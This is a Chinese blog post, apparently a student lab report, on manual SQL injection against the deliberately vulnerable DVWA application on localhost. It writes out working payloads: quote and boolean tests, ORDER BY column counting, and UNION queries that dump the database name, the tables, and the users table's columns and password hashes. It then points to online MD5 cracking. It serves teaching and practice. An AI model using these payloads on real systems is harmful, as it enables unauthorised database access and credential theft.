1+X 网络安全运营平台与管理 sql注入实验报告

最新推荐文章于 2024-02-29 17:35:57 发布
最新推荐文章于 2024-02-29 17:35:57 发布
阅读量2.2k 收藏 19
点赞数 4
文章标签: 数据库 sql 服务器 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68012373/article/details/127923276
版权

实验目的:

掌握SQLmap 的使用 SQL注入漏洞利用

1、了解数据库的查询规则

2、熟悉SQL查询语句

3、了解SQL注入的危害性

实验设备 (环境) 

          环境:phpstudy软件  dvwa靶场  Windows 10 x64

实验要求:

        1.判断是否存在注入,注入是字符型还是数字型;

        2.猜解当前数据库名;

        3.猜解数据库中的表名;

        4.猜解表中的字段名;

        5.猜解数据

实验原理:

       1、数据库基础

       2、SQL注入漏洞利用

       3、报错注入

       4、盲注

       5、HTTP文件头注入

       6、SQLmap 的使用

实验步骤:

1.访问靶场地址http://127.0.0.1/DVWA-master/security.php,

在dvwa security选项中,可以调整dvwa的难易程度 

将安全等级改为low

2.选择SQL Injection,在输入框随意输入数字查看回显

3.判断是否存在SQL注入

  • 输入1提交
  • 输入1'提交

  • 输入1 and 1=1 提交

  •  输入1 and 1=2 提交

 由上可以看出是存在注入点的,并且是以单引号闭合的,

所以我们猜测sql查询语句是这样的:

Select  First name的列名and Surname的列名 from 表名 where id的列名='id'

4.判断列数

  • 输入1' order by 2# 提交
  •  输入1' order by 3# 提交

 

 由此,我们判断列数为2列

5.UNION注入

1' union select 1,2#

 从上图可以看出有2个回显

6.查询当前的数据库及版本

输入 1' union select version(),database()#

 7.获取数据库中的表

1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#或者

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

 8.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 9.获取字段中的数据

 10.这里密码使用了MD5加密,可在https://www.cmd5.com/进行解密

 得到密码

实验总结:

本次实验过程中,了解了其原理并掌握了其注入的方法及流程。在寻找可进行注入的URL过程中,尝试着对多个URL进行SQL注入,使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞,确认注入是字符型还是数字型;判断列,然后就行UNION注入进而猜解当前数据库名表名;字段名;从而获得数据


 加油各位( •̀ ω •́ )y 期待与君再相逢

路baby
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
mysql实验报告3_Web安全技术 实验报告SQL注入
weixin_42589700的博客
01-19 542
一、SQL注入1.数字型注入随便选一个,抓包可以看到是POST直接加一个真命题可以看到都爆出来了。2.字符型注入先输入‘ 有报错,所以存在SQL注入。我们直接构造payload:1' or 1=1#OK3.搜索型注入也是加单引号,发现报错,存在SQL注入点。这个类型,我们推测用的是SQL语句中的like来进行模糊判断那我们就可以猜测模糊查询的字段应该是'%查询内容%'那么我可以构造1%' or 1...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
SQL注入实验报告
热门推荐
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理与SQL注入工作原理,能够实现简单的SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
SQl注入之读写文件注入实验报告
Devil_ping的博客
02-10 532
读写文件受到权限影响 secure_file_priv= 代表文件读写没有限制 secure_file_priv=NULL 代表没有读写文件权限 secure_file_priv= d:/phpstudy/mysql/aa 代表只能对该路径下文件进行读写 这个权限在数据库配置文件my.ini里,默认是没有的 读文件 loa...
SQL注入相关实验报告.doc
01-05
将恶意的SQL命令插入到输入域名或页面请求的查询字符串注入到后台数据库,输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
网络安全实验步骤+实验报告
06-07
内含实验目的、实验原理、实验内容、实验步骤(文字+截图)、实验思考。(共五个实验) 综合扫描实验 邮件明文密码窃听 SQL注入 IPtables防火墙配置 IPS部署实验
《计算机网络安全实验》实验报告1
11-01
【计算机网络安全实验】实验报告1主要探讨了DVWA(Damn Vulnerable Web Application)中的PHP与MySQL环境下的SQL注入漏洞。该实验旨在让学生理解和掌握SQL注入的原理、利用方法以及防御措施。以下是实验涉及的主要...
SQL注入大作业报告,自建简易sql注入漏洞平台
01-03
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统。这个大作业报告的主题是“自建简易SQL注入漏洞平台”,显然,它旨在帮助学习者理解和实践如何预防和检测这类攻击。 首先,我们...
SQL注入项目报告(全英文)
10-09
这是我课程的项目报告,详细介绍了SQL注入漏洞的原理和手动检测方法,最后针对一种简单的SQL注入漏洞设计了一个自动检测漏洞的软件,该软件的基本架构是自己写的一个网络爬虫,希望对大家有帮助.软件的源代码过几天我也会上传我的资源里面
中科大信安SQL注入报告
07-11
中科大信息安全导论实验18年春
sql注入论文
01-08
关于SQL注入步骤及预防攻略,具体设计到access和sqlserver
sqlmap进行sql注入测试的报告
weixin_35752233的博客
02-08 379
sqlmap是一款开源的SQL注入自动化工具。它可以帮助渗透测试人员自动化地扫描Web应用程序并检测SQL注入漏洞。 在进行SQL注入测试时,sqlmap会尝试将恶意SQL语句注入到Web应用程序的输入字段中,并检测程序是否可以执行这些语句。如果程序可以执行恶意语句,则说明存在SQL注入漏洞。 在测试结束后,sqlmap会生成一份报告,其中包含测试结果、发现的漏洞信息以及执行的SQL注入攻击。这份...
实验吧-简单的sql注入2 Writeup
baynk的博客
07-28 294
抓紧时间来搞,事情越来越多。。。 过程 输入1'后有报错,单引号闭合,尝试了--+和%23均无法注释,又试过了构造闭合,发现and和or也都用不了。加上这次只要被检测出来就直接就有提示界面,并不像上一个那样有信息可看,感觉挺麻烦的。 于是判断到底是如何被检测的,然后试过了双写,大小写啥的,都不行,于是我直接把所有的空格都去掉了,写成了1'and1='1,这次总算有提示了。 从上面就能看出来,如果...
sql注入漏洞和实验
最新发布
2303_81447649的博客
02-29 1214
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入。SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全平台安全
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 6320
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
SQL注入漏洞提交报告(示例)
王先生的博客
04-01 8556
一、详细说明: 危害说明:攻击者可以使用 SQL 注入绕过 Web 应用程序的身份验证和授权机制,并检索整个数据库的内容。SQLi 还可用于添加、修改和删除数据库中的记录,从而影响数据完整性。在适当的情况下,攻击者还可以使用 SQLi 来执行操作系统命令,然后可以使用这些命令进一步升级攻击。 测试步骤: burp抓包分析可知图为sql注入位置 下图可证明存在SQL注入漏洞 二、漏洞复现辅助信息: 漏洞URL:https://jl.175game.com/index.php/guide/index/i
电子商务网站SQL注入项目实战一例
weixin_33961829的博客
07-23 151
故事A段:发现整站SQL对外输出:   有个朋友的网站,由于是外包项目,深圳某公司开发的,某天我帮他检测了一下网站相关情况。 我查看了页面源代码,发现了个惊人的事情,竟然整站打印SQL到Html里,着实吓我一跳: PS:2年前秋色园系列文章有分享一文是整站SQL打印用于分析网站性能,不过也只是本地优化调试,而服务器上也采用某特殊条件才打印。 于是把这赤祼祼的对外公开的SQL问题反映了过去...
sql注入公司的项目
hello_simon的专栏
09-14 658
这是在做公司的项目时发现的
网络安全实验报告SQL注入到堆原理分析
"该资源是一份来自中国矿业大学计算机学院2017级信息安全专业的本科生袁孝健的网络攻防课程报告,涵盖了SQL注入、XML注入、跨站脚本攻击、文件上传漏洞以及PHP代码审计等多个实验内容,并深入探讨了堆原理及调试技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路baby

你的鼓励将是我创作的最大动力✌

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值